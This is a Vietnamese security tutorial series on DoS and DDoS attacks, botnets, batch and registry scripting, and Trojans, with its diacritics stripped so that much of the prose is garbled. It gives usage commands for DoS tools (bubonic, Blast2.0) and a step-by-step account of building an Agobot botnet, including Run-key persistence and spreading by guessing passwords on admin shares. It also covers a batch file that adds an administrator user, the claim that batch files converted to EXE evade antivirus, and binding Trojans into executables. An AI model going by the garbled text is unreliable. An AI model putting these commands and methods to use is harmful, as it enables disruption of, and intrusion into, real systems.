+ Disable Organization - T chc khng hot ng + Financial Loss Ti chnh b mt 2. Mc tiu m k tn cng thng s dng tn cng DoS Nh chng ta bit bn trn tn cng DoS xy ra khi k tn cng s dng ht ti nguyn ca h thng v h thng khng th p ng cho ngi dng bnh thng c vy cc ti nguyn chng thng s dng tn cng l g: - To ra s khan him, nhng gii hn v khng i mi ti nguyn - Bng thng ca h thng mng (Network Bandwidth), b nh, a, v CPU Time hay cu trc d liu u l mc tiu ca tn cng DoS. - Tn cng vo h thng khc phc v cho mng my tnh nh: h thng iu ho, h thng in, ht hng lm mt v nhiu ti nguyn khc ca doanh nghip. Bn th tng tng khi ngun in vo my ch web b ngt th ngi dng c th truy cp vo my ch khng. - Ph hoi hoc thay i cc thng tin cu hnh. - Ph hoi tng vt l hoc cc thit b mng nh ngun in, iu ho III. Cc dng tn cng Tn cng Denial of Service chia ra lm hai loi tn cng - Tn cng DoS: Tn cng t mt c th, hay tp hp cc c th. - Tn cng DDoS: y l s tn cng t mt mng my tnh c thit k tn cng ti mt ch c th no . 1. Cc dng tn cng DoS - Smurf - Buffer Overflow Attack
- Ping of Death - Teardrop - SYN Attack a. Tn cng Smurf - L th phm sinh ra cc nhiu giao tip ICMP (ping) ti a ch Broadcast ca nhiu mng vi a ch ngun l mc tiu cn tn cng. * Chng ta cn lu l: Khi ping ti mt a ch l qu trnh hai chiu Khi my A ping ti my B my B reply li hon tt qu trnh. Khi ti ping ti a ch Broadcast ca mng no th ton b cc my tnh trong mng s Reply li ti. Nhng gi ti thay i a ch ngun, thay a ch ngun l my C v ti ping ti a ch Broadcast ca mt mng no , th ton b cc my tnh trong mng s reply li vo my C ch khng phi ti v l tn cng Smurf. - Kt qu ch tn cng s phi chu nhn mt t Reply gi ICMP cc ln v lm cho mng b dt hoc b chm li khng c kh nng p ng cc dch v khc. - Qu trnh ny c khuych i khi c lung ping reply t mt mng c kt ni vi nhau (mng BOT). - tn cng Fraggle, chng s dng UDP echo v tng t nh tn cng Smurf.
I-train.com.vn
Hnh hin th tn cng DoS - dng tn cng Smurf s dng gi ICMP lm ngp cc giao tip khc. b. Tn cng Buffer overflow. - Buffer Overflow xy ra ti bt k thi im no c chng trnh ghi lng thng tin ln hn dung lng ca b nh m trong b nh. - K tn cng c th ghi ln d liu v iu khin chy cc chng trnh v nh cp quyn iu khin ca mt s chng trnh nhm thc thi cc on m nguy him. - Tn cng Buffer Overflow ti trnh by cch khai thc li ny trong bi vit trc v hacking windows cng trn trang www.vnexperts.net.
I-train.com.vn
- Qu trnh gi mt bc th in t m file nh km di qu 256 k t c th s xy ra qu trnh trn b nh m. c. Tn cng Ping of Death
- K tn cng gi nhng gi tin IP ln hn s lng bytes cho php ca tin IP l 65.536 bytes. - Qu trnh chia nh gi tin IP thnh nhng phn nh c thc hin layer II. - Qu trnh chia nh c th thc hin vi gi IP ln hn 65.536 bytes. Nhng h iu hnh khng th nhn bit c ln ca gi tin ny v s b khi ng li, hay n gin l s b gin on giao tip. - nhn bit k tn cng gi gi tin ln hn gi tin cho php th tng i d dng. d. Tn cng Teardrop - Gi tin IP rt ln khi n Router s b chia nh lm nhiu phn nh.
I-train.com.vn
- K tn cng s dng s dng gi IP vi cc thng s rt kh hiu chia ra cc phn nh (fragment). - Nu h iu hnh nhn c cc gi tin c chia nh v khng hiu c, h thng c gng build li gi tin v iu chim mt phn ti nguyn h thng, nu qu trnh lin tc xy ra h thng khng cn ti nguyn cho cc ng dng khc, phc v cc user khc. e. Tn cng SYN
- K tn cng gi cc yu cu (request o) TCP SYN ti my ch b tn cng. x l lng gi tin SYN ny h thng cn tn mt lng b nh cho kt ni. - Khi c rt nhiu gi SYN o ti my ch v chim ht cc yu cu x l ca my ch. Mt ngi dng bnh thng kt ni ti my ch ban u thc hin Request
TCP SYN v lc ny my ch khng cn kh nng p li - kt ni khng c thc hin. - y l kiu tn cng m k tn cng li dng qu trnh giao tip ca TCP theo Three-way. - Cc on m nguy him c kh nng sinh ra mt s lng cc ln cc gi TCP SYN ti my ch b tn cng, a ch IP ngun ca gi tin b thay i v chnh l tn cng DoS. - Hnh bn trn th hin cc giao tip bnh thng vi my ch v bn di th hin khi my ch b tn cng gi SYN n s rt nhiu trong khi kh nng tr li ca my ch li c hn v khi my ch s t chi cc truy cp hp php. - Qu trnh TCP Three-way handshake c thc hin: Khi my A mun giao tip vi my B. (1) my A bn ra mt gi TCP SYN ti my B (2) my B khi nhn c gi SYN t A s gi li my A gi ACK ng kt ni (3) my A gi li my B gi ACK v bt u cc giao tip d liu. - My A v my B s d kt ni t nht l 75 giy, sau li thc hin mt qu trnh TCP Three-way handshake ln na thc hin phin kt ni tip theo trao i d liu. - Tht khng may k tn cng li dng k h ny thc hin hnh vi tn cng nhm s dng ht ti nguyn ca h thng bng cch gim thi gian yu cu Three-way handshake xung rt nh v khng gi li gi ACK, c bn gi SYN ra lin tc trong mt thi gian nht nh v khng bao gi tr li li gi SYN&ACK t my b tn cng. - Vi nguyn tc ch chp nhn gi SYN t mt my ti h thng sau mi 75 giy nu a ch IP no vi phm s chuyn vo Rule deny access s ngn cn tn cng ny.
IV. Cc cng c tn cng DoS - Jolt2 - Bubonic.c - Land and LaTierra - Targa - Blast20 - Nemesy - Panther2 - Crazy Pinger - Some Trouble - UDP Flood - FSMax
I-train.com.vn
1. Tools DoS Jolt2
- Cho php k tn t chi dch v (DoS) ln cc h thng trn nn tng Windows - N l nguyn nhn khin my ch b tn cng c CPU lun hot ng mc 100%, CPU khng th x l cc dch v khc. - Khng phi trn nn tng Windows nh Cisco Router v mt s loi Router khc cng c th b l hng bo mt ny v b tools ny tn cng. 2. Tools DoS: Bubonic.c - Bubonic.c l mt tools DoS da vo cc l hng bo mt trn Windows 2000 - N hot ng bng cch ngu nhin gi cc gi tin TCP vi cc thit lp ngu nhin lm cho my ch tn rt nhiu ti nguyn x l vn ny, v t s xut hin nhng l hng bo mt. - S dng bubonic.c bng cch g cu lnh: bubonic 12.23.23.2 10.0.0.1 100
I-train.com.vn
3. Tools DoS: Land and LaTierra - Gi mo a ch IP c kt hp vi qu trnh m cc kt ni gia hai my tnh. - C hai a ch IP, a ch ngun (source) v a ch IP ch, c chnh sa thnh mt a ch ca IP ch khi kt ni gia my A v my B ang c thc hin nu c tn cng ny xy ra th kt ni gia hai my A v B s b ngt kt ni. - Kt qu ny do a ch IP ngun v a ch IP ch ca gi tin ging nhau v gi tin khng th i n ch cn n. 4. Tools DoS: Targa - Targa l mt chng chnh c th s dng 8 dng tn cng DoS khc nhau. - N c coi nh mt b hng dn tch hp ton b cc nh hng ca DoS v thng l cc phin bn ca Rootkit. - K tn cng s dng mt trong cc phng thc tn cng c th ti mt h thng bao gi t c mc ch th thi. - Targa l mt chng trnh y sc mnh v n c kh nng to ra mt s nguy him rt ln cho h thng mng ca mt cng ty.
5. Tools DoS Blast 2.0 - Blast rt nh, l mt cng c dng kim tra kh nng ca dch v TCP n c kh nng to ra mt lu lng rt ln gi TCP v c th s gay nguy him cho mt h thng mng vi cc server yu. - Di y l cch s dng tn cng HTTP Server s dng Blast2.0 + Blast 192.168.1.219 80 40 50 /b GET /some /e url/ HTTP/1.0 /nr /dr /v - Tn cng my ch POP + Blast 192.168.1.219 110 15 20 /b user te /e d /v 6. Tools DoS Nemesys
- y l mt chng trnh sinh ra nhng gi tin ngu nhin nh (protocol, port, etc. size, ) - Da vo chng trnh ny k tn cng c th chy cc on m nguy him vo my tnh khng c bo mt.
I-train.com.vn
7. Tool DoS Panther2.
- Tn cng t chi dch v da trn nn tng UDP Attack c thit k dnh ring cho kt ni 28.8 56 Kbps. - N c kh nng chim ton b bng thng ca kt ni ny. - N c kh nng chim bng thng mng bng nhiu phng php v nh thc hin qu trnh Ping cc nhanh v c th gy ra tn cng DoS 8. Tool DoS Crazy Pinger - Cng c ny c kh nng gi nhng gi ICPM ln ti mt h thng mng t xa.
I-train.com.vn
I-train.com.vn
9. Tool DoS Some Trouble
- SomeTrouble 1.0 l mt chng trnh gy nghn h thng mng - SomeTrouble l mt chng trnh rt n gin vi ba thnh phn + Mail Bomb (t c kh nng Resole Name vi a ch mail c) + ICQ Bomb + Net Send Flood
I-train.com.vn
10. DoS Tools UDP Flood
- UDPFlood l mt chng trnh gi cc gi tin UDP - N gi ra ngoi nhng gi tin UDP ti mt ac h IP v port khng c nh - Gi tin c kh nng l mt on m vn bn hay mt s lng d liu c sinh ngu nhin hay t mt file. - c s dng kim tra kh nng p ng ca Server
I-train.com.vn
11. Tools DoS FSMAX
- Kim tra hiu nng p ng ca my ch. - N to ra mt file sau chy trn Server nhiu ln lp i lp li mt lc. - Tc dng ca tools ny l tm cch tn cng lm chn b nh m v tn cng DoS ti my ch. V. Kt lun phn I. - Khi s dng mt Tool tn cng DoS ti mt my ch i khi khng gy nh hng g cho my ch - Gi s bn s dng tool Ping of Death ti mt my ch, trong my ch kt ni vi mng tc 100Mbps bn kt ni ti my ch tc 3Mbps - Vy tn cng ca bn khng c ngha g. - Nhng bn hy tng tng c 1000 ngi nh bn cng mt lc tn cng vo my ch kia khi ton b bng thng ca 1000 ngi cng li ti a t 3Gbps v tc kt ni ca my ch l 100 Mbps vy kt qu s ra sao cc bn c kh nng tng tng.
I-train.com.vn
- Trong phn II ca lot bi vit ti s trnh by vi cc bn nhng ni dung v nh ngha BOT, BOTNET, cch xy dng, cch s dng cc BOTNET t chng ta hiu cch hot ng v tm ra nhng gii php chng tn cng DDoS mt cch hiu qu nht. Theo - Tocbatdat ca Vnexperts Research Department
I-train.com.vn
Phn tip ca bi vit v tn cng DoS v DDoS ti s trnh by vi cc bn ni dung chi tit v mng Bot, cc dng mng Bot v cch to ra mng Botnet. Khi hiu v mng Botnet bn c th hnh dung ra phng thc tn cng DDoS. Trong phn II ny ti cng trnh by vi cc bn chi tit cc phng thc tn cng DDoS cc thc hin cc phng thc tn cng ny. Nhng bi vit ny ch c tc dng gip cc bn hiu bit su v tn cng DDoS m thi, cc tools gii thiu ch mang tnh gii thiu v n l cc tools DDoS c. VI. Mng BOT NET 1. ngha ca mng BOT - Khi s dng mt Tool tn cng DoS ti mt my ch i khi khng gy nh hng g cho my ch - Gi s bn s dng tool Ping of Death ti mt my ch, trong my ch kt ni vi mng tc 100Mbps bn kt ni ti my ch tc 3Mbps - Vy tn cng ca bn khng c ngha g. - Nhng bn hy tng tng c 1000 ngi nh bn cng mt lc tn cng vo my ch kia khi ton b bng thng ca 1000 ngi cng li ti a t 3Gbps v tc kt ni ca my ch l 100 Mbps vy kt qu s ra sao cc bn c kh nng tng tng. - Nhng ti ang th hi lm cch no c 1000 my tnh kt ni vi mng ti i mua mt nghn chic v thu 1000 thu bao kt ni - chc chn ti khng lm nh vy ri v cng khng k tn cng no s dng phng php ny c. - K tn cng xy dng mt mng gm hng nghn my tnh kt Internet (c mng BOT ln ti 400.000 my). Vy lm th no chng c kh nng li dng ngi kt ni ti Internet xy dng mng BOT trong bi vit ny ti s gii thiu vi cc bn cc mng BOT v cch xy dng, nhng Tool xy dng.
I-train.com.vn
- Khi c trong tay mng BOT k tn cng s dng nhng tool tn cng n gin tn cng vo mt h thng my tnh. Da vo nhng truy cp hon ton hp l ca h thng, cng mt lc chng s dng mt dch v ca my ch, bn th tng tng khi k tn cng c trong tay 400.000 my ch v cng mt lc ra lnh cho chng download mt file trn trang web ca bn. V chnh l DDoS Distributed Denial of Servcie - Khng c mt phng thc chng tn cng DDoS mt cch hon ton nhng trong bi vit ny ti cng gii thiu vi cc bn nhng phng php phng chng DDoS khi chng ta hiu v n. 2. Mng BOT - BOT t vit tt ca t RoBOT - IRCbot cn c gi l zombia hay drone. - Internet Relay Chat (IRC) l mt dng truyn d liu thi gian thc trn Internet. N thng c thit k sao cho mt ngi c th nhn c cho mt group v mi ngi c th giao tip vi nhau vi mt knh khc nhau c gi l Channels. - u tin BOT kt ni knh IRC vi IRC Server v i giao tip gia nhng ngi vi nhau. - K tn cng c th iu khin mng BOT v s dng mng BOT cng nh s dng nhm mt mc ch no . - Nhiu mng BOT kt ni vi nhau ngi ta gi l BOTNET botnet. 3. Mng Botnet. - Mng Botnet bao gm nhiu my tnh - N c s dng cho mc ch tn cng DDoS
- Mt mng Botnet nh c th ch bao gm 1000 my tnh nhng bn th tng tng mi my tnh ny kt ni ti Internet tc ch l 128Kbps th mng Botnet ny c kh nng to bng thng l 1000*128 ~ 100Mbps y l mt con s th hin bng thng m kh mt nh Hosting no c th share cho mi trang web ca mnh. 4. Mc ch s dng mng Botnets - Tn cng Distributed Denial-of-Service - DDoS + Botnet c s dng cho tn cng DDoS - Spamming + M mt SOCKS v4/v5 proxy server cho vic Spamming - Sniffing traffic + Bot cng c th s dng cc gi tin n sniffer (tm c cc giao tip trn mng) sau khi tm c cc gi tin n c gng gii m gi tin ly c cc ni dung c ngha nh ti khon ngn hng v nhiu thng tin c gi tr khc ca ngi s dng. - Keylogging + Vi s tr gip ca Keylogger rt nhiu thng tin nhy cm ca ngi dng c th s b k tn cng khai thc nh ti khon trn e-banking, cng nh nhiu ti khon khc. - Ci t v ly nhim chng trnh c hi + Botnet c th s dng to ra mng nhng mng BOT mi. - Ci t nhng qung co Popup + T ng bt ra nhng qung co khng mong mun vi ngi s dng.
- Google Adsense abuse + T ng thay i cc kt qu tm kim hin th mi khi ngi dng s dng dch v tm kim ca Google, khi thay i kt qu n s la ngi dng kch vo nhng trang web nguy him. - Tn cng vo IRC Chat Networks + N c gi l clone attack - Phishing + Mng botnet cn c s dng phishing mail nhm ly cc thng tin nhy cm ca ngi dng. 5. Cc dng ca mng BOT. Agobot/Phatbot/Forbot/XtremBot - y l nhng bot c vit bng C++ trn nn tng Cross-platform v m ngun c tm trn GPL. Agobot c vit bi Ago nick name c ngi ta bit n l Wonk, mt thanh nin tr ngi c b bt hi thng 5 nm 2004 vi ti danh v ti phm my tnh. - Agobot c kh nng s dng NTFS Alternate Data Stream (ADS) v nh mt loi Rootkit nhm n cc tin trnh ang chy trn h thng SDBot/Rbot/UrBot/UrXbot - SDBot c vit bng ngn ng C v cng c public bi GPL. N c coi nh l tin thn ca Rbot, RxBot, UrBot, UrXBot, JrBot mIRC-Based Bots GT-Bots
I-train.com.vn
- GT c vit tt t fhai t Global Threat v tn thng c s dng cho tt c cc mIRC-scripted bots. N c kh nng s dng phn mm IM l mIRC thit lp mt s script v mt s on m khc.
6. Cc bc xy dng mng BotNet? Cch phn tch mng Bot. hiu hn v xy dng h thng mng BotNet chng ta nghin cu t cch ly nhim vo mt my tnh, cch to ra mt mng Bot v dng mng Bot ny tn cng vo mt ch no ca mng Botnet c to ra t Agobots. Bc 1: Cch ly nhim vo my tnh. - u tin k tn cng la cho ngi dng chy file chess.exe, mt Agobot thng copy chng vo h thng v s thm cc thng s trong Registry m bo s chy cng vi h thng khi khi ng. Trong Registry c cc v tr cho cc ng dng chy lc khi ng ti. HKLM\Software\Microsoft\Windows\CurrentVersion\Run HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices Bc 2: Cch ly lan v xy dng to mng BOTNET - Sau khi trong h thng mng c mt my tnh b nhim Agobot, n s t ng tm kim cc my tnh khc trong h thng v ly nhim s dng cc l hng trong ti nguyn c chia s trong h thng mng. - Chng thng c gng kt ni ti cc d liu share mc nh dnh cho cc ng dng qun tr (administrator or administrative) v d nh: C$, D$, E$ v print$ bng cch on usernames v password c th truy cp c vo mt h thng khc v ly nhim.
I-train.com.vn
- Agobot c th ly lan rt nhanh bi chng c kh nng tn dng cc im yu trong h iu hnh Windows, hay cc ng dng, cc dch v chy trn h thng. Bc 3: Kt ni vo IRC. - Bc tip theo ca Agobot s to ra mt IRC-Controlled Backdoor m cc yu t cn thit, v kt ni ti mng Botnet thng qua IRC-Controll, sau khi kt ni n s m nhng dch v cn thit khi c yu cu chng s c iu khin bi k tn cng thng qua knh giao tip IRC. Bc 4: iu khin tn cng t mng BotNet. - K tn cng iu khin cc my trong mng Agobot download nhng file .exe v chy trn my. - Ly ton b thng tin lin quan v cn thit trn h thng m k tn cng mun. - Chy nhng file khc trn h thng p ng yu cu ca k tn cng. - Chy nhng chng trnh DDoS tn cng h thng khc.
I-train.com.vn
7. S cch h thng b ly nhim v s dng Agobot.
VII. Cc tools tn cng DDoS 1. Nuclear Bot. - Nuclear Bot l mt tool cc mnh Multi Advanced IRC BOT c th s dng Floods, Managing, Utilities, Spread, IRC Related, tn cng DDoS v nhiu mc ch khc.
I-train.com.vn
VIII. Tn cng DDoS
Trn Internet tn cng Distributed Denial of Service l mt dng tn cng t nhiu my tnh ti mt ch, n gy ra t chi cc yu cu hp l ca cc user bnh
I-train.com.vn
thng. Bng cch to ra nhng gi tin cc nhiu n mt ch c th, n c th gy tnh trng tng t nh h thng b shutdown. 1. Cc c tnh ca tn cng DDoS. - N c tn cng t mt h thng cc my tnh cc ln trn Internet, v thng da vo cc dch v c sn trn cc my tnh trong mng botnet - Cc dch v tn cng c iu khin t nhng primary victim trong khi cc my tnh b chim quyn s dng trong mng Bot c s dng tn cng thng c gi l secondary victims. - L dng tn cng rt kh c th pht hin bi tn cng ny c sinh ra t nhiu a ch IP trn Internet. - Nu mt a ch IP tn cng mt cng ty, n c th c chn bi Firewall. Nu n t 30.000 a ch IP khc, th iu ny l v cng kh khn. - Th phm c th gy nhiu nh hng bi tn cng t chi dch v DoS, v iu ny cng nguy him hn khi chng s dng mt h thng mng Bot trn internet thc hin tn cng DoS v c gi l tn cng DDoS. 2. Tn cng DDoS khng th ngn chn hon ton. - Cc dng tn cng DDoS thc hin tm kim cc l hng bo mt trn cc my tnh kt ni ti Internet v khai thc cc l hng bo mt xy dng mng Botnet gm nhiu my tnh kt ni ti Internet. - Mt tn cng DDoS c thc hin s rt kh ngn chn hon ton. - Nhng gi tin n Firewall c th chn li, nhng hu ht chng u n t nhng a ch IP cha c trong cc Access Rule ca Firewall v l nhng gi tin hon ton hp l.
I-train.com.vn
- Nu a ch ngun ca gi tin c th b gi mo, sau khi bn khng nhn c s phn hi t nhng a ch ngun tht th bn cn phi thc hin cm giao tip vi a ch ngun . - Tuy nhin mt mng Botnet bao gm t hng nghn ti vi trm nghn a ch IP trn Internet v iu l v cng kh khn ngn chn tn cng. 3. K tn cng khn ngoan. Gi y khng mt k tn cng no s dng lun a ch IP iu khin mng Botnet tn cng ti ch, m chng thng s dng mt i tng trung gian di y l nhng m hnh tn cng DDoS a. Agent Handler Model K tn cng s dng cc handler iu khin tn cng
b. Tn cng DDoS da trn nn tng IRC K tn cng s dng cc mng IRC iu khin, khuych i v qun l kt ni vi cc my tnh trong mng Botnet.
I-train.com.vn
IX. Phn loi tn cng DDoS - Tn cng gy ht bng thng truy cp ti my ch. + Flood attack + UDP v ICMP Flood (flood gy ngp lt) - Tn cng khuch i cc giao tip + Smurf and Fraggle attack Tn cng DDoS vo Yahoo.com nm 2000
I-train.com.vn
S phn loi tn cng DDoS
S tn cng DDoS dng Khuch i giao tip. Nh cc bn bit tn cng Smurf khi s dng s Ping n a ch Broadcast ca mt mng no m a ch ngun chnh l a ch ca my cn tn cng, khi ton b cc gi Reply s c chuyn ti a ch IP ca my tnh b tn cng.
I-train.com.vn
X. Tn cng Reflective DNS (reflective - phn chiu). 1. Cc vn lin quan ti tn cng Reflective DNS - Mt Hacker c th s dng mng botnet gi rt nhiu yu cu ti my ch DNS. - Nhng yu cu s lm trn bng thng mng ca cc my ch DNS, - Vic phng chng dng tn cng ny c th dng Firewall ngn cm nhng giao tip t cc my tnh c pht hin ra. - Nhng vic cm cc giao tip t DNS Server s c nhiu vn ln. Mt DNS Server c nhim v rt quan trng trn Internet. - Vic cm cc giao tip DNS ng ngha vi vic cm ngi dng bnh thng gi mail v truy cp Website.
I-train.com.vn
- Mt yu cu v DNS thng chim bng 1/73 thi gian ca gi tin tr li trn my ch. Da vo yu t ny nu dng mt Tools chuyn nghip lm tng cc yu cu ti my ch DNS s khin my ch DNS b qu ti v khng th p ng cho cc ngi dng bnh thng c na. 2. Tool tn cng Reflective DNS ihateperl.pl - ihateperl.pl l chng trnh rt nh, rt hiu qu, da trn kiu tn cng DNSReflective - N s dng mt danh sch cc my ch DNS lm trn h thng mng vi cc gi yu cu Name Resolution. - Bng mt v d n c th s dng google.com resole gi ti my ch v c th i tn domain thnh www.vnexperts.net hay bt k mt trang web no m k tn cng mun. - s dng cng c ny, rt n gin bn to ra mt danh sch cc my ch DNS, chuyn cho a ch IP ca my c nhn v thit lp s lng cc giao tip. XI. Cc tools s dng tn cng DDoS. Trong ton b cc tools ti gii thiu trong bi vit ny hu ht l cc tools c v khng hiu qu, v ch mang tnh cht s phm cc bn c th hiu v dng tn cng DDoS hn m thi. Di y l cc Tools tn cng DDoS. - Trinoo - Shaft - Trinity - Knight - Mstream - Kaiten - Tribe flood Network (TFN) - TFN2K - Stacheldraht
Cc tools ny bn hon ton c th Download min ph trn Internet v lu l ch th y l cc tools yu v ch mang tnh Demo v tn cng DdoS m thi.
I-train.com.vn
I-train.com.vn
Phn VI. K thut edit Registry bng cu lnh v ng dng bo mt 1. Vai tr ca command line 2. To ra file .bat thc thi t ng mt s thao tc 3. Cu hnh REGISTRY bng file.bat 4. ng dng cu hnh REGISTRY 5. Kt lun
1. Vai tr ca Command Line - Bt k ngi qun tr h thng no cng phi s dng giao din cu lnh ca cc h iu hnh. Trong h thng Windows cu lnh cng c s dng em li s thun tin v tnh linh hot trong vic qun tr.
2. To ra file.bat thc thi t ng mt s thao tc - Giao din cu lnh khi c thc hin di dng file.bat cho php thc hin nhiu cu lnh lin tip. - V d 1: s dng notepad vit ni dung di y v save ra file.bat:
I-train.com.vn
Khi chy file.bat ny h thng s thc hin (1) to ra user vi tn tocbatdat (2) add user vo Group Administrators (3) Disabled Service DHCP Client (4) Tt Service DHCP Client (5) khi ng li my ngay lp tc. (Cc cu lnh NET, SC, Shutdown u c cc Options cc bn c th s dng bng cch g cu lnh ri thm /? s hin cc options ca cu lnh ). Mt s cu lnh hay s dng: NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP | HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ] cho php t o user, group, xem cc thng tin truy cp v mng ca my tnh. NETSH cu l nh ny cho php thit lp tt c mi thng s lin quan ti network nh: a ch IP, DNS, routing WMIC Trong giao di n ny cung cp rt nhiu options qun l my tnh - V d 2: to ra mt file.bat nhm mc ch to ra mt file vi ni dung l cc cu hnh ca my tnh:
I-train.com.vn
V file.bat ni dung nh trn s to ra c mt file l c.txt vi ni dung: IP, i cc tin trnh ang hot ng, cc user trong my tnh, cc port m, cc services ang hot ng, nhng thng tin chung trong h thng, cu trc th mc ca C.Nh vy vi mt file.bat c to ra c th ly rt nhiu thng tin ca my tnh.
3. Cu hnh REGISTRY bng file.bat Mun cu hnh Registry chng ta phi lm cch no thc hin c hai tc v: Bc 1: to ra file.reg vi ni dung mong mun bng cu lnh Bc 2: chy file.reg va to ra
I-train.com.vn
V d 3: chng ta cn to ra file.reg vi ni dung nh sau:
to ra file.reg vi ni dung nh trn bng mt file.bat nh sau:
Mt file.bat vi ni dung nh trn s thc hin nhng tc v g: Bc 1: To ra c mt file.bat vi ni dung mong mun nh phn u ca v d Bc 2: Chy file.reg va to ra Bc 3: Xa ht cc file to ra Kt qu sau khi to ra v chy file.bat vi ni dung ny s thm c mt key vo Registry V d 4: Sau khi thm c mt key vo gi ti li mun xa mt key trong Registry th phi to ra mt file.bat vi ni dung ra sao:
I-train.com.vn
Mt file.bat vi ni dung nh trn c hy s thc hin cc tc v g: Bc 1: To ra file.reg vi ni dung mong mun. Khi mt folder l dng th 2 c la chn, trong mt folder ca Registry c nhiu key nhng ti ch mun xa mt key l TOCBATDAT th ti c dng th 3. Dng th 4 l xa c mt folder trong Registry. Bc 2: Chy file.reg Bc 3: xa ht cc file to ra. K lun trong mc 3 ny ti hng dn mi ngi cch Edit (Thm, sa, t xa) Registry bng cu lnh, c bit l bng file.bat
4. ng dng cu hnh REGISTRY Registry l ni lu ton b cc thit lp ca h thng Windows. V d 5: Uninstall bt k chng trnh no. Trc tin chng ta hiu bn cht ca vn Uninstall mt chng trnh l th no: - Bc 1: tt tin trnh, tt services
I-train.com.vn
- Bc 2: Xa ht nhng g lin quan ti chng trnh trong Regisry - Bc 3: Xa thng tin trong Program files thc hin bc 1: ta c cu lnh: Taskkill /F /IM Processname tt mt tin chnh, tt mt services chng ta c cu lnh net stop servicename, disable mt services c cu lnh sc config servicename start= disabled thc hin bc 2: Trong mc 3 ti trnh by cch xa mt folder, key trong registry vy l chng ta c th thc hin bc 2 ca Uninstall. uninstall hon ton mt chng trnh yu cu chng ta phi tm c tt c cc key, folder ca chng trnh trong registry. iu dn ti nu mt chng trnh ln nh Microsoft office bn mun remove kiu ny l cc kh. Ti c mt kinh nghim khi vit ra mt file.bat remove phn mm symantec phi lm mt 3 ngy v n c 500 key trong registry cn xa. thc hin bc 3: Xa file c cu lnh delete file /f /q. Xa ht file trong mt foder dng cu lnh delete c:\folder\* /f /q Tch h tt c cc bc trong mt file.bat l c th thc hin c tt c mi p vic. V d 6: Khng cho php mt file c kh nng chy trn my tnh. V d ny cho php chng ta to ra mt file.bat ngn chn mt con virus khng cho n chy trn my ca chng ta. Bn cht ca qu trnh l s dng Group Policy trong phn Software retriction rules hash rule. Nhng Group Policy ch l giao din ha edit Registry, cho nn chng ta hon ton c th edit regisry lm mt tc v tng t.
I-train.com.vn
5. Kt lun Vic s dng file.bat cu hnh c Registry mang li nhiu gi tr gip cc bn nghin cu v bo mt v hiu bit su hn v h thng. c bit khi cc file.bat ny chuyn sang file.exe khng bao gi b coi l virus.
I-train.com.vn
Phn VII. Backdoor v Trojan ton tp Trong bi vit ny ti s trnh by vi cc bn v Trojan v Backdoor. Nhng khi nim c bn v Trojan v Backdoor, phn loi v cch thc ly nhim Trojan v Backdoor. Cng vi nhng kin thc khc nh s dng mt s Trojan c bn, cch thc n Trojan vo trong mt file .Exe. Cui cng ti s a ra cc gii php phng chng Trojan v Backdoor. 1. Gii thiu v Trojans 2. Cc dng v cch hot ng ca Trojan 3. Cch nhn bit my tnh b nhim Trojan 4. S khc nhau ca cc Trojans 5. S dng mt s Trojan tn cng 6. Ghp mt hay nhiu Trojans vo mt file .EXE bnh thng 7. Cch pht hin Trojans v Backdoor 8. Gii php phng chng Trojan Backdoor 9. Kt lun 1. Gii thiu v Trojans. - Mt Trojan l mt chng trnh nh chy ch n v gy hi cho my tnh. - Vi s tr gip ca Trojan, mt k tt cng c th d dng truy cp vo my tnh ca nn nhn thc hin mt s vic nguy hi nh ly cp d liu, xa file, v nhiu kh nng khc.
I-train.com.vn
2. Cc dng v cch hot ng ca Trojan - K tn cng c th truy cp c vo cc my tnh b nhim Trojans khi chng Online. - K tn cng c th truy cp v iu khin ton b my tnh ca nn nhn, v chng c kh nng s dng vo nhiu mc ch khc nhau.
- Cc dng Trojans c bn: +Remote Access Trojans Cho k tn cng kim sot ton b h thng t xa. + Data-Sending Trojans Gi nhng thng tin nhy cm cho k tn cng + Destructive Trojans Ph hy h thng
I-train.com.vn
+ Denied-of-Service DoS Attack Trojan: Trojans cho tn cng DoS. + Proxy Trojans + HTTP, FTP Trojans: - Trojan t to thnh HTTP hay FTP server k tn cng khai thc li. + Security Software Disable Trojan C tc dng tt nhng tnh nng bo mt trong my tnh ca nn nhn. - Mc ch ca nhng k vit ra nhng Trojans: + Ly thng tin ca Credit Card + Ly thng tin ca cc ti khon c nhn nh: Email, Password, Usernames, + Nhng d liu mt. + Thng tin ti chnh: Ti khon ngn hng + S dng my tnh ca nn nhn thc hin mt tc v no , nh tn cng, scan, hay lm ngp h thng mng ca nn nhn.
3. Nhng con ng my tnh nn nhn nhim Trojan. - Qua cc ng dng CHAT online nh IRC Interney Relay Chat - Qua cc file c nh km trn Mail - Qua tng vt l nh trao i d liu qua USB, CD, HDD
I-train.com.vn
- Khi chy mt file b nhim Trojan - Qua NetBIOS FileSharing - Qua nhng chng trnh nguy him - T nhng trang web khng tin tng hay nhng website cung cp phn mm min ph - N c kh nng n trong cc ng dng bnh thng, khi chy ng dng lp tc cng chy lun Trojans. 4. Nhng cch nhn bit mt my tnh b nhim Trojans C bn nht C th khng ng. - CD-ROM t ng m ra ng vo. - My tnh c nhng du hiu l trn mn hnh. - Hnh nn ca cc ca s Windows b thay i - Cc vn bn t ng in - My tinh t ng thay i font ch v cc thit lp khc - Hnh nn my tnh t ng thay i v khng th i li. - Chut tri, chut phi ln nn.. - Chut khng hin th trn mn hnh. - Nt Start khng hin th. - Mt vi ca s cht bt ra
Cc Port s dng bi cc Trojan ph bin. - Back Orifice S dng UDP protocol S dng Port 31337 v 31338
I-train.com.vn
- Deep Throat S dng UDP protocol S dng Port 2140 v 3150 - NetBus S dng TCP Protocol S dng Port 12345 v 12346 - Whack-a-mole S dng TCP Qua Port 12361 v 12362 - Netbus 2 Pro S dng TCP Qua Port 20034 - GrilFriend - S dng Protocol TCP Qua Port 21544 - Masters Paradise - S dng TCP Protocol qua Port 3129, 40421,40422, 40423 v 40426. nhn bit nhng Port no trn my tnh ang Active chng ta dng cu lnh: Netstat an
5. S dng mt s loi Trojan Vi mc ch ca bi vit cc bn hiu v Trojan, s dng Trojan l mt trong nhng ni dung c bn ca nghin cu v bo mt. Khi bit cch s dng v cch hot ng ca cc loi Trojan bn c th t a ra cc gii php an ninh mng
